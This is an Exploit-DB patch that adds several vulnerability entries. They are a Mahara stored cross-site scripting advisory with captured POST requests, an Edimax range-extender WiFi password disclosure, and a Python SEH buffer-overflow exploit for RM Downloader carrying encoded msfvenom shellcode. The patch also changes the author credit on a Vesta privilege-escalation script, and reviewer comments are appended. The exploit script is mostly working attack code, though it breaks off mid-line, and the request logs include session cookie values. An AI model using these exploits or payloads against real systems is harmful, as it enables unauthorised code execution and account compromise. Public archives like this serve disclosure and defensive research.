From 7b676133d39c5513942f3dde6073b9739ff01226 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Apr 2020 05:01:50 +0000 Subject: [PATCH] DB: 2020-04-23 5 changes to exploits/shellcodes Vesta Control Panel 0.9.8-16 - Local Privilege Escalation RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) Edimax EW-7438RPn - Information Disclosure (WiFi Password) Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) Mahara 19.10.2 CMS - Persistent Cross-Site Scripting --- exploits/hardware/webapps/48365.txt | 94 +++++++++++ exploits/hardware/webapps/48366.txt | 32 ++++ exploits/linux/local/40953.sh | 2 +- exploits/linux/webapps/48367.txt | 248 ++++++++++++++++++++++++++++ exploits/windows/local/48364.py | 69 ++++++++ files_exploits.csv | 6 +- 6 files changed, 449 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/48365.txt create mode 100644 exploits/hardware/webapps/48366.txt create mode 100644 exploits/linux/webapps/48367.txt create mode 100755 exploits/windows/local/48364.py diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt new file mode 100644 index 000000000..c8a33a664 --- /dev/null +++ b/exploits/hardware/webapps/48365.txt @@ -0,0 +1,94 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) +# Date: 2020-04-21 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +----------------------------- +Here step by step : + + 1. I did Setup + 2. After setup try to access to *wlencrypt_wiz.asp* file + 3. After access to this file, I saw some information disclosure +(Like *WiFi Password*) + 4. Here is the all leak here: + +------------------------------- + + +
+ + + + + + + + +
+ + + +-- + +Besim ALTINOK + +*Security Engineer* \ No newline at end of file diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh index b00215e3a..e56a4c896 100755 --- a/exploits/linux/local/40953.sh +++ b/exploits/linux/local/40953.sh @@ -2,7 +2,7 @@ # # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit # Google Dork: vesta control panel inurl:8083 -# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker +# Exploit Author: Jaka Hudoklin @offlinehacker # Vendor Homepage: http://vestacp.com/ # Software Link: https://github.com/serghey-rodin/vesta # Version: 0.9.7 - 0.9.8-16 diff --git a/exploits/linux/webapps/48367.txt b/exploits/linux/webapps/48367.txt new file mode 100644 index 000000000..acf9f3180 --- /dev/null +++ b/exploits/linux/webapps/48367.txt 
@@ -0,0 +1,248 @@ +# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Vendor: https://mahara.org +# Software Link: https://launchpad.net/mahara +# CVE: N/A + +Document Title: +=============== +Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2217 + +Release Date: +============= +2020-04-21 + +Common Vulnerability Scoring System: +==================================== +4.3 + +Affected Product(s): +==================== +Catalyst IT Ltd. +Product: Mahara v19.10.2 - CMS (Web-Application) +https://launchpad.net/mahara & https://mahara.org + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Mahara v19.10.2 CMS web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The persistent vulnerability is located in the `nombre` and +`descripción` parameters of the `Ficheros` module in the +`groupfiles.php` file. +Remote attackers with low privileges are able to inject own malicious +persistent script code as files and foldernames. The injected code can +be used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector is located on +the application-side. Files are able to be reviewed in the backend by +higher privileged accounts and can be shared. 
+ +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Ficheros (Files Manager) + +Vulnerable Input(s): +[+] Crear Carpeta + +Vulnerable File(s): +[+] groupfiles.php + + +Vulnerable Parameter(s): +[+] nombre +[+] descripción + +Affected Module(s): +[+] Página principal + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the web-application and login as regular user +2. Move inside the mygroup management +3. Open the ficheros tab on top +4. Inject test payload into the crear carpeta (Nombre & Descripción) +input field for the página principal to output +Note: The execution point occurs on edit, list and delete interaction +5. The created path listings are available for higher privileged user +account that review (Backend) +6. Successul reproduce of the persistent cross site web vulnerability! + + +PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) + + +
+Seleccionar y arrastrar para mover >" +>" + +
+ + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: 
no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: 
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py new file mode 100755 index 000000000..9cc992e06 --- /dev/null +++ b/exploits/windows/local/48364.py 
@@ -0,0 +1,69 @@ +# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) +# Date: 2020-04-20 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe +# Version: 3.1.3.2.2010.06.13 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open 'RmDownloader.exe' +# 4.- Go to 'Load' tab +# 5.- Paste clipboard in 'Load' parameter +# 6.- Click on button 'OK' +# 7.- Two messageboxes regarding the length of the payload will pop up, click OK +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" +buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" +buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" +buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" +buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" +buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" +buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" +buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" +buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" +buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" +buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" +buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" +buf += 
b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" +buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" +buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" +buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" +buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" +buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" +buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" +buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" +buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" +buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" +buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" +buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" +buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" +buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" +buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" +buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" +buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" +buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" +buf += b"\x50\x65\x67\x70\x41\x41" + + +nseh = struct.pack("
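Review bot: in exploits/hardware/webapps/48365.txt the finding cannot be reproduced from the hunk itself; steps 2 to 4 say to request `wlencrypt_wiz.asp` after setup and that the WiFi password appears there, but the lines following "Here is the all leak here:" carry no visible content, so a reader cannot see which field holds the key or whether the page was fetched with or without authenticating to the device. Suggest adding the exact request (method and path) and a short response excerpt showing the password field, and stating explicitly whether a session cookie was required. Header nits: "Version:1.13" lacks the space the other header fields use, and unlike 48367.txt there is no "CVE:" line. Also note that the diffstat lists `exploits/hardware/webapps/48366.txt` (the companion CSRF entry) as created, but its diff does not appear in the patch as shown here.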
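Review bot: the hunk in exploits/linux/local/40953.sh drops "Luka Pusic," from the Exploit Author line, and the commit message lists only the five new entries, so this credit change is unrecorded. Suggest adding a line to the commit message stating that the attribution was corrected, and confirm that the author column for 40953 in files_exploits.csv, which the diffstat shows with 6 changed lines but whose hunk is not included here, was updated to match; otherwise the CSV and the file header will disagree.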
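Review bot: in exploits/linux/webapps/48367.txt the vulnerable parameters are named by their Spanish UI labels ("nombre", "descripción", "Crear Carpeta", "Ficheros") rather than by the request fields, which the captured POST to `artefact/file/groupfiles.php` shows are `files_filebrowser_edit_title`, `files_filebrowser_edit_description`, `files_filebrowser_edit_licensor` and `files_filebrowser_edit_licensorurl`; the "Vulnerable Parameter(s)" section should list those so the finding can be matched against the code regardless of locale. The impact claim "session hijacking" is not supported by the captured response: the `set-cookie` line shows the `mahara` cookie with `secure; HttpOnly`, so injected script cannot read it; keep the phishing, redirect and content-manipulation impact and drop or qualify hijacking. As it appears here the "PoC: Vulnerable Source" block is reduced to `>" >"` fragments with the markup stripped, so the stored payload is not visible; the CVSS score of 4.3 is given without a vector string; the document title reads "Persistent Cross Site Vulnerability" (missing "Scripting"); and "Successul" is a typo. Finally, the session logs include the tester's live `mahara` session cookie, `__cfduid` and `sesskey` values, which should be redacted before publication.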
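Review bot: the hunk header for exploits/windows/local/48364.py promises 69 added lines, but the copy here stops mid-statement at `nseh = struct.pack("`, so the parts that decide whether an SEH overwrite works cannot be reviewed: the offset to nSEH, the pop/pop/ret address and the module it comes from (and whether that module is compiled without SafeSEH and is not rebased), the short jump placed in nSEH, and the write of `poc.txt`. Please confirm the full file landed and add a comment naming the module and why it was chosen. The header also lacks a "CVE:" line. The shellcode listing is internally consistent: the 35 `buf +=` lines (34 of 13 bytes plus one of 6) total the 448 bytes stated in the msfvenom comment.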